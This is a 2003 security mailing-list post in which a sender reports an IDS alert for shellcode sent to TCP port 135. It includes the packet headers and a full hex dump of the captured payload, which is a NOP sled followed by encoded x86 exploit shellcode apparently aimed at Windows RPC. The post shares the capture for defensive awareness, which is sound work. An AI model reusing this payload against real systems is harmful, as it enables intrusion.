[Dshield] shellcode detect on port 135

DAN MORRILL dan_20407 at msn.com
Thu Aug 21 13:00:10 GMT 2003


New and interesting, shell code detect on port 135 around 2003-08-21 
02:33:54

I have never seen shell code on port 135 before. Here is as much information 
on this as I Have, if I see any other detects, I will forward if wanted.

Good Morning!
r/
Dan

--------------------------------------------------------------------------------
Meta  ID # Time Triggered Signature
5 - 6051 2003-08-21 02:33:54 [arachNIDS][snort] SHELLCODE x86 NOOP

Sensor name interface filter


IP  source addr   dest addr   Ver Hdr Len TOS length ID flags offset TTL 
chksum
65.104.244.139 	X.X.X.X 	4 5 0 806 50174 0 0 111 19765

FQDN Source Name Dest. Name
w139.z065104244.aus-tx.dsl.cnc.net

Options     none

D-Port 135

N seq # ack offset res window urp chksum
3946 135    X  X     1569699291 2059210510 5 0 64180 0 37506

Options     none

Payload   length = 766

000 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
010 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
020 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
030 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
040 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
050 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
060 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
070 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
080 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
090 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
100 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
110 : 90 90 90 90 90 90 90 90 90 90 90 90 EB 10 5A 4A   ..............ZJ
120 : 33 C9 66 B9 76 01 80 34 0A 99 E2 FA EB 05 E8 EB   3.f.v..4........
130 : FF FF FF 70 61 99 99 99 C3 21 95 69 64 E6 12 99   ...pa....!.id...
140 : 12 E9 85 34 12 D9 91 12 41 12 EA A5 9A 6A 12 EF   ...4....A....j..
150 : E1 9A 6A 12 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8   ..j....b....t...
160 : 12 A6 9A 62 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A   ...b.k...j?.....
170 : 5E 9D DC 7B 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48   ^..{p....T....ZH
180 : 78 9A 58 AA 50 FF 12 91 12 DF 85 9A 5A 58 78 9B   x.X.P.......ZXx.
190 : 9A 58 12 99 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3   .X...Z.c.n._..I.
1a0 : 9A C0 71 ED 99 99 99 1A 5F 94 CB CF 66 CE 65 C3   ..q....._...f.e.
1b0 : 12 41 F3 9A C0 71 F8 99 99 99 1A 75 DD 12 6D F3   .A...q.....u..m.
1c0 : 89 C0 10 9D 17 7B 62 C9 C9 C9 C9 F3 98 F3 9B 66   .....{b........f
1d0 : CE 6D 12 41 10 C7 A1 10 C7 A5 10 C7 D9 FF 5E DF   .m.A..........^.
1e0 : B5 98 98 14 DE 89 C9 CF AA 59 C9 C9 C9 F3 98 C9   .........Y......
1f0 : C9 14 CE A5 5E 9B FA F4 FD 99 CB C9 66 CE 71 5E   ....^.......f.q^
200 : 9E 9B 99 9B 5A 5E DE 9D D8 F1 6D 12 F3 89 CE CA   ....Z^....m.....
210 : 66 CE 61 CA 66 CE 65 C9 66 CE 75 AA 59 35 1C 59   f.a.f.e.f.u.Y5.Y
220 : EC 60 C8 CB CF CA 66 4B C3 C0 32 7B 77 AA 59 5A   .`....fK..2{w.YZ
230 : 71 9A 66 66 66 DE FC ED C9 EB F6 FA D8 FD FD EB   q.fff...........
240 : FC EA EA 99 DA EB FC F8 ED FC C9 EB F6 FA FC EA   ................
250 : EA D8 99 DC E1 F0 ED CD F1 EB FC F8 FD 99 D5 F6   ................
260 : F8 FD D5 F0 FB EB F8 EB E0 D8 99 EE EA AB C6 AA   ................
270 : AB 99 CE CA D8 CA F6 FA F2 FC ED D8 99 FA F6 F7   ................
280 : F7 FC FA ED 99 FA F5 F6 EA FC EA F6 FA F2 FC ED   ................
290 : 99 00 5C 00 43 00 24 00 5C 00 31 00 32 00 33 00   ..\.C.$.\.1.2.3.
2a0 : 34 00 35 00 36 00 31 00 31 00 31 00 31 00 31 00   4.5.6.1.1.1.1.1.
2b0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00   1.1.1.1.1.1.1.1.
2c0 : 31 00 31 00 2E 00 64 00 6F 00 63 00 00 00 01 10   1.1...d.o.c.....
2d0 : 08 00 CC CC CC CC 20 00 00 00 30 00 2D 00 00 00   ...... ...0.-...
2e0 : 00 00 88 2A 0C 00 02 00 00 00 01 00 00 00 28 8C   ...*..........(.
2f0 : 0C 00 01 00 00 00 07 00 00 00 00 00 00 00         ..............








Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. 
Please resend when you get those, it does not mean that the mail box is bad, 
merely that MSN mail is over worked at the time.

Otherwise, hope things are going well.
r/
Dan

_________________________________________________________________
Chat privately with Bon Jovi, Seal, Bow Wow, or Mary J Blige using MSN 
Messenger! http://www5.msnmessenger-download.com/imastar/default.aspx




More information about the list mailing list